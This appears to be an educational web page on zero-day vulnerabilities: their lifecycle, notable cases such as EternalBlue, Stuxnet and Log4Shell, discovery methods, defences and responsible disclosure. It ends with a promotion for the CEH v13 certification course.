Zero-Day
A vulnerability unknown to the vendor, with no patch available.
Exploit
Code that weaponises a vulnerability to gain unauthorised access.
CVE
Common Vulnerabilities and Exposures — the global numbering system for known flaws.
Patch Gap
The dangerous window between a vulnerability being discovered and a patch being deployed.

Understanding zero-day vulnerabilities

The name "zero-day" comes from the vendor's perspective: they have had zero days to work on a patch because they don't know the flaw exists. Once the vulnerability is publicly disclosed, it becomes a "one-day" or "n-day" — but until that moment, defenders are completely blind.

A zero-day has three stages: the vulnerability (the flaw in the code), the exploit (the technique to weaponise it), and the attack (using the exploit against a real target). Not every zero-day becomes an attack — some are discovered by security researchers and disclosed responsibly before criminals ever find them.

Why "zero-day"? The term originates from the warez scene of the 1990s, where "zero-day" software meant a pirated copy released on the same day as the official launch — implying freshness and the absence of any protective response.

The zero-day lifecycle

From discovery to protection, a zero-day moves through a predictable chain. Understanding this chain helps defenders shorten the window of exposure.

  1. 1
    Discovery — A researcher, attacker, or automated fuzzing tool finds unexpected behaviour in software. The discoverer decides whether to report it, sell it, or exploit it silently.
  2. 2
    Weaponisation — An exploit is written that reliably triggers the vulnerability. Nation-states and criminal groups invest heavily in this phase, sometimes spending months refining a reliable exploit.
  3. 3
    Exploitation — The exploit is used against targets. Nation-state actors typically target a small number of high-value targets; criminal groups may deploy widely via phishing or exploit kits.
  4. 4
    Disclosure — The vulnerability becomes known, either through responsible disclosure by a researcher, accidental leakage, or detection by the vendor. The clock starts ticking for a patch.
  5. 5
    Patching — The vendor releases a security update. However, the exploit still works for all unpatched systems — sometimes billions of devices.
  6. 6
    Deployment — Organisations apply the patch. This phase can take weeks or months, especially in large enterprises — extending the window of risk long after a fix exists.

Famous zero-day exploits

Zero-days have shaped some of the most consequential cyberattacks in history. Three examples illustrate how wide-ranging their impact can be:

EternalBlue
NSA-developed SMB exploit leaked by Shadow Brokers in 2017. Weaponised within weeks by WannaCry and NotPetya — causing over $10 billion in global damage.
Stuxnet
Used four simultaneous Windows zero-days to sabotage Iranian nuclear centrifuges. Widely regarded as the world's first cyberweapon. Operated silently for years.
Log4Shell
CVE-2021-44228, CVSS 10.0. A single line of user-controlled input could trigger remote code execution in billions of Java applications. Exploited within hours of disclosure.

How zero-days are discovered

Zero-days don't require magic — they require patience, expertise, and tooling. Attackers and researchers use similar techniques to uncover hidden flaws:

  • Fuzzing: Automated tools bombard software with malformed input to trigger crashes, which often reveal exploitable conditions.
  • Source code auditing: Reviewing open-source code or reverse-engineering binaries to find logic errors, integer overflows, and use-after-free bugs.
  • Variant analysis: After a patch is released for one vulnerability, researchers look for similar flaws in nearby code — often finding multiple zero-days in one audit.
  • Symbolic execution: Advanced tools mathematically explore all possible execution paths through a program to find reachable dangerous states.
The grey market reality: A reliable iOS zero-day exploit can fetch over $1 million USD on grey markets. Nation-state intelligence agencies are willing buyers, creating a financial incentive to hoard vulnerabilities rather than disclose them.

Defending against zero-days

By definition, you cannot patch a vulnerability you don't know about. But you can dramatically reduce the blast radius when a zero-day is exploited:

  • Patch n-days fast: 70% of attacks use known vulnerabilities with available patches. Fast patching of known CVEs prevents attackers from reusing old techniques.
  • Network segmentation: Limit what a compromised system can reach. A zero-day in a web server shouldn't give access to your database.
  • Behavioural detection (EDR): Modern endpoint detection doesn't rely on signatures — it watches for suspicious behaviour like unusual process injection or privilege escalation.
  • Least privilege: Running software with minimal permissions limits what an exploit can do even if it succeeds.
  • Sandboxing: Isolating untrusted code (email attachments, browser tabs) limits zero-day impact to the sandbox environment.

Bug bounties and responsible disclosure

Bug bounty programmes offer a legal, ethical way for security researchers to report vulnerabilities in exchange for financial rewards. Companies like Google, Microsoft, and Apple run programmes that pay tens of thousands of dollars for critical discoveries — channelling the same talent that might otherwise sell to grey markets into defensive outcomes.

Responsible disclosure (also called "coordinated disclosure") is the standard practice: a researcher reports a flaw privately to the vendor, allows a reasonable time for a patch (typically 90 days), and then discloses publicly. This balances transparency with giving users time to update.

Learn vulnerability research in CEH v13

EC-Council's CEH v13 covers CVE analysis, exploit development methodology, and vulnerability scanning across 20 modules with hands-on Kali Linux labs.

Explore CEH v13